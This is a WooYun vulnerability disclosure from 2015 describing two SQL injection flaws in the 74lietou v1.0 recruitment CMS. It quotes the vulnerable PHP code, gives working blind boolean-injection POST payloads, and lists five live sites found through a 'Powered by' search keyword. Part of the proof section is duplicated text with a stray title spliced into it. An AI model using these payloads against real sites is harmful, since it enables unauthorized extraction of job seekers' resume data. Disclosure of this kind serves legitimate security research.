当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128454

漏洞标题:74lietou v1.0最新注入2处(可获取部分数据)

相关厂商:74c,s.com

漏洞作者: Xser

提交时间:2015-07-23 12:09

修复时间:2015-10-26 12:10

公开时间:2015-10-26 12:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

官网地址:http://74lietou.74cms.com/

详细说明:

在/plus/ajax_user.php中

elseif($act == 'only_check_language'){ $lang = trim($_POST['param'])?trim($_POST['param']):exit("选择语言不能为空!"); $sql = "select * from ".table('resume_language')." where language = ".$lang." and uid = ".$_SESSION['uid']; $userinfo=$db->getone($sql); if ($userinfo) { exit("已经选择此语言!"); }else{ exit("y"); }


POST值过来,没有单引号包含,导致注入
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
POST值

param=12' ||%20left(version(),1)%20between%200%20and%205--%20a


这样猜解数据库版本第一位是0到5之间,返回已经选择此语言!

param=12' ||%20left(version(),1)%20between%200%20and%204--%20a


这样猜解数据库版本第一位是0到4之间,返回y

360截图-1870531.jpg


360截图-1882703.jpg


第二处出现在/user/company/company_recruitment.php中

elseif($act =="export_resume") { $yid =!empty($_REQUEST['y_id'])?$_REQUEST['y_id']:showmsg("你没有选择简历!",1); if(!export_resume($yid)){ showmsg("导出失败!",0); }

跟踪export_resume 

function export_resume($yid){ global $db; if(is_array($yid) && !empty($yid)) { $yid_str = implode(",", $yid); } else { $yid_str=$yid; } $oederbysql=" order BY refreshtime desc "; $wheresql = empty($wheresql)?" id in ({$yid_str}) ":" and id in ({$yid_str}) "; if (!empty($wheresql)) { $wheresql=" WHERE ".ltrim(ltrim($wheresql),'AND'); } $data = $db->getall("select * from ".table('resume').$wheresql);


$_REQUEST['y_id']没有被过滤
导致过滤,这个要登录而且要被审核就不用官网演示了本地测试!

360截图-2515750.jpg


360截图-2536218.jpg


一样用POST值

' ||%20left(version(),1)%20between%200%20and%205--%20a


这样猜解数据库版本第一位是0到5之间

' ||%20left(version(),1)%20between%200%20and%204--%20a


这样猜解数据库版本第一位是0到4之间
这样的办法就可以注入了,这个不演示了
案例:
关键字Powered by 74lietou v1.0

http://www.5i5s.com/plus/ajax_user.php?act=only_check_language
http://lietou.hi772.com/plus/ajax_user.php?act=only_check_language
http://www.haolietou.com/plus/ajax_user.php?act=only_check_language
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
http://www.elancejob.com/plus/ajax_user.php?act=only_check_language

漏洞证明:

在/plus/ajax_user.php中

elseif($act == 'only_check_language'){ $lang = trim($_POST['param'])?trim($_POST['param']):exit("选择语言不能为空!"); $sql = "select * from ".table('resume_language')." where language = ".$lang." and uid = ".$_SESSION['uid']; $userinfo=$db->getone($sql); if ($userinfo) { exit("已经选择此语言!"); }else{ exit("y"); }


POST值过来,没有单引号包含,导致注入
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
POST值

param=12' ||%20left(version(),1)%20between%200%20and%205--%20a


这样猜解数据库版本第一位是0到5之间,返回已经选择此语言!

param=12' ||%20left(version(),1)%20between%200%20and%204--%20a


这样猜解数据库版本第一位是0到4之间,返回y

360截图-1870531.jpg


360截图-1882703.jpg


第二处出现在/user/company/company_recruitment.php中

elseif($act =="export_resume") { $yid =!empty($_REQUEST['y_id'])?$_REQUEST['y_id']:showmsg("你没有选择简历!",1); if(!export_resume($yid)){ showmsg("导出失败!",0); }

跟踪export_resume 

function export_resume($yid){ global $db; if(is_array($yid) && !empty($yid)) { $yid_str = implode(",", $yid); } else { $yid_str=$yid; } $oederbysql=" order BY refreshtime desc "; $wheresql = empty($wheresql)?" id in ({$yid_str}) ":" and id in ({$yid_str}) "; if (!empty($wheresql)) { $wheresql=" WHERE ".ltrim(ltrim($wheresql),'AND'); } $data = $db->getall("select * from ".table('resume').$wheresql);


$_REQUEST['y_id']没有被过滤
导致过滤,这个要登录而且要被审核就不用官网演示了本地测试!

360截图-2515750.jpg


360截图-2536218.jpg


一样用POST值74lietou v1.0最新绕过全局防御注入2处(官网演示)
这样的办法就可以注入了,这个不演示了
案例:
关键字Powered by 74lietou v1.0

http://www.5i5s.com/plus/ajax_user.php?act=only_check_language
http://lietou.hi772.com/plus/ajax_user.php?act=only_check_language
http://www.haolietou.com/plus/ajax_user.php?act=only_check_language
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
http://www.elancejob.com/plus/ajax_user.php?act=only_check_language

修复方案:

过滤

版权声明:转载请注明来源 Xser@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-26 12:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无